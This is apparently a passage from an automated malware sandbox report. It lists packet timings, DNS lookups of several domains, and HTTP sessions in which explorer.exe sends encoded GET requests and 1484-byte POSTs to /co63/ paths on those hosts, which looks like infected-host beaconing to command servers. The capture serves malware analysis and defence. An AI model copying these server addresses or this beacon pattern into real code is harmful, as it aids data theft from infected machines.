                                                      Jul 20, 2023 11:45:36.429642916 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429661036 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429680109 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429682970 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429698944 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429717064 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429734945 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429753065 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429760933 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429760933 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429770947 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429790020 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429797888 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429797888 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429807901 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429825068 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429840088 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429842949 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429862022 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429863930 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429879904 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429881096 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429899931 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429913998 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429918051 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429934025 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429935932 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429965019 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.430016994 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.430067062 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.438208103 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:46:17.486185074 CEST804972834.149.87.45192.168.2.5
                                                      Jul 20, 2023 11:46:17.491805077 CEST804972834.149.87.45192.168.2.5
                                                      Jul 20, 2023 11:46:17.509630919 CEST804972834.149.87.45192.168.2.5
                                                      Jul 20, 2023 11:46:17.509665966 CEST804972834.149.87.45192.168.2.5
                                                      Jul 20, 2023 11:46:17.509748936 CEST4972880192.168.2.534.149.87.45
                                                      Jul 20, 2023 11:46:17.509749889 CEST4972880192.168.2.534.149.87.45
                                                      Jul 20, 2023 11:46:39.632174969 CEST4972980192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:39.804155111 CEST8049729184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:39.806226969 CEST4972980192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:39.806387901 CEST4972980192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:39.981245041 CEST8049729184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.046875954 CEST8049729184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.046921968 CEST8049729184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.047055960 CEST4972980192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.318197966 CEST4972980192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.321100950 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.493654013 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.493870974 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.497159958 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.669481993 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.669533968 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.669572115 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.669718027 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.669822931 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.841839075 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.841993093 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.841998100 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.842068911 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.842461109 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.842556953 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.842860937 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.842879057 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.842921972 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.842971087 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.843384027 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.843400002 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:40.843456984 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:40.843482018 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:41.014617920 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.014664888 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.014693022 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.014893055 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:41.015006065 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:41.015253067 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.015269995 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.015285015 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.015353918 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:41.015414000 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:41.015517950 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.015798092 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:41.016294956 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.016315937 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.016724110 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.016983986 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.017002106 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.017486095 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.187256098 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.187295914 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.187498093 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.187877893 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.188208103 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.189101934 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.189146996 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.189440012 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.189799070 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.190282106 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.190409899 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.190475941 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.190679073 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.290138006 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.290162086 CEST8049730184.94.215.140192.168.2.5
                                                      Jul 20, 2023 11:46:41.290365934 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:41.290407896 CEST4973080192.168.2.5184.94.215.140
                                                      Jul 20, 2023 11:46:57.349117041 CEST4973180192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:57.366036892 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.367245913 CEST4973180192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:57.367342949 CEST4973180192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:57.384066105 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.400480032 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.400513887 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.400532961 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.400551081 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.400568962 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.400583029 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.400650024 CEST4973180192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:57.400686979 CEST4973180192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:57.400702953 CEST4973180192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:57.401159048 CEST804973123.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:57.401220083 CEST4973180192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.526452065 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.543009043 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.543163061 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.543375015 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.543407917 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.544631958 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.559838057 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.559873104 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.560976028 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.561135054 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.563703060 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.580229998 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.580279112 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.580302954 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.580319881 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.580336094 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.580430984 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.580509901 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.596923113 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.597090960 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.597136974 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.597157001 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.597245932 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.597282887 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.597474098 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.597589016 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.599745035 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.613538980 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.613570929 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.613589048 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.613641977 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.613662958 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.613708973 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.613753080 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.614551067 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.614574909 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.614590883 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.614639997 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.614686966 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.614686966 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.630139112 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.630172014 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.630188942 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.630207062 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.630223036 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.630294085 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.630461931 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.630877018 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.631354094 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.631373882 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.631741047 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.646867990 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.646897078 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.647073030 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800354958 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800379038 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800404072 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800429106 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800453901 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800478935 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800503969 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800518990 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.800538063 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.800563097 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800587893 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800616026 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800622940 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.800640106 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.800653934 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.800676107 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.800689936 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.801067114 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.801091909 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.801119089 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.801127911 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.801153898 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.801161051 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.801187038 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.801193953 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.801222086 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802037954 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802067041 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802090883 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802104950 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802130938 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802140951 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802162886 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802172899 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802195072 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118531942 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118568897 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118597031 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118621111 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118647099 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118666887 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118670940 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118699074 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118716955 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118721008 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118731976 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118753910 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.122561932 CEST4973380192.168.2.523.227.38.74
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jul 20, 2023 11:44:35.818205118 CEST | 192.168.2.5 | 8.8.8.8 | 0x365a | Standard query (0) | www.vestostore.com | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:44:50.552478075 CEST | 192.168.2.5 | 8.8.8.8 | 0xc6ab | Standard query (0) | www.saleschildcarriers.com | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:45:11.235212088 CEST | 192.168.2.5 | 8.8.8.8 | 0x2bf2 | Standard query (0) | www.ballthingsez.com | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:45:33.849143028 CEST | 192.168.2.5 | 8.8.8.8 | 0x9184 | Standard query (0) | www.dlafluid.com | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:45:54.516891956 CEST | 192.168.2.5 | 8.8.8.8 | 0xeeba | Standard query (0) | www.myccsmartmove.com | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:46:15.094552040 CEST | 192.168.2.5 | 8.8.8.8 | 0x3fe3 | Standard query (0) | www.takealicense.com | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:46:39.587030888 CEST | 192.168.2.5 | 8.8.8.8 | 0x310b | Standard query (0) | www.naspewt.xyz | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:46:57.250439882 CEST | 192.168.2.5 | 8.8.8.8 | 0x1688 | Standard query (0) | www.mattewigs.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jul 20, 2023 11:44:35.879318953 CEST | 8.8.8.8 | 192.168.2.5 | 0x365a | No error (0) | www.vestostore.com | vestostore.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:44:35.879318953 CEST | 8.8.8.8 | 192.168.2.5 | 0x365a | No error (0) | vestostore.com | | 86.38.202.187 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:44:50.588876009 CEST | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | www.saleschildcarriers.com | | 172.67.215.254 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:44:50.588876009 CEST | 8.8.8.8 | 192.168.2.5 | 0xc6ab | No error (0) | www.saleschildcarriers.com | | 104.21.75.67 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:45:11.283035040 CEST | 8.8.8.8 | 192.168.2.5 | 0x2bf2 | No error (0) | www.ballthingsez.com | 4zmf1gx83y.azureedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:45:11.283035040 CEST | 8.8.8.8 | 192.168.2.5 | 0x2bf2 | No error (0) | scdn2de06.wpc.9972b.lambdacdn.net | sni1gl.wpc.lambdacdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:45:11.283035040 CEST | 8.8.8.8 | 192.168.2.5 | 0x2bf2 | No error (0) | sni1gl.wpc.lambdacdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:45:33.890857935 CEST | 8.8.8.8 | 192.168.2.5 | 0x9184 | No error (0) | www.dlafluid.com | dlafluid.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:45:33.890857935 CEST | 8.8.8.8 | 192.168.2.5 | 0x9184 | No error (0) | dlafluid.com | | 34.102.136.180 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:45:54.714396000 CEST | 8.8.8.8 | 192.168.2.5 | 0xeeba | No error (0) | www.myccsmartmove.com | 342284.parkingcrew.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:45:54.714396000 CEST | 8.8.8.8 | 192.168.2.5 | 0xeeba | No error (0) | 342284.parkingcrew.net | | 76.223.26.96 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:45:54.714396000 CEST | 8.8.8.8 | 192.168.2.5 | 0xeeba | No error (0) | 342284.parkingcrew.net | | 13.248.148.254 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:46:15.173907995 CEST | 8.8.8.8 | 192.168.2.5 | 0x3fe3 | No error (0) | www.takealicense.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:46:15.173907995 CEST | 8.8.8.8 | 192.168.2.5 | 0x3fe3 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:46:15.173907995 CEST | 8.8.8.8 | 192.168.2.5 | 0x3fe3 | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:46:39.627633095 CEST | 8.8.8.8 | 192.168.2.5 | 0x310b | No error (0) | www.naspewt.xyz | | 184.94.215.140 | A (IP address) | IN (0x0001) | false |
| Jul 20, 2023 11:46:57.310929060 CEST | 8.8.8.8 | 192.168.2.5 | 0x1688 | No error (0) | www.mattewigs.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 20, 2023 11:46:57.310929060 CEST | 8.8.8.8 | 192.168.2.5 | 0x1688 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false |
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      0 | 192.168.2.5 | 49711 | 86.38.202.187 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:44:37.828722954 CEST | 121 | OUT | GET /co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.vestostore.com
                                                      Connection: close
                                                      Jul 20, 2023 11:44:37.992095947 CEST | 122 | IN | HTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Thu, 20 Jul 2023 09:44:37 GMT
                                                      server: LiteSpeed
                                                      location: https://www.vestostore.com/co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH-
                                                      platform: hostinger
                                                      content-security-policy: upgrade-insecure-requests
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      1 | 192.168.2.5 | 49712 | 86.38.202.187 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:44:40.282881975 CEST | 124 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.vestostore.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.vestostore.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.vestostore.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:44:40.445296049 CEST | 125 | IN | HTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Thu, 20 Jul 2023 09:44:40 GMT
                                                      server: LiteSpeed
                                                      location: https://www.vestostore.com/co63/
                                                      platform: hostinger
                                                      content-security-policy: upgrade-insecure-requests
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      10 | 192.168.2.5 | 49721 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:45:36.345082998 CEST | 485 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.dlafluid.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.dlafluid.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.dlafluid.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:45:36.473906040 CEST | 641 | IN | HTTP/1.1 405 Method Not Allowed
                                                      Server: openresty
                                                      Date: Thu, 20 Jul 2023 09:45:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 154
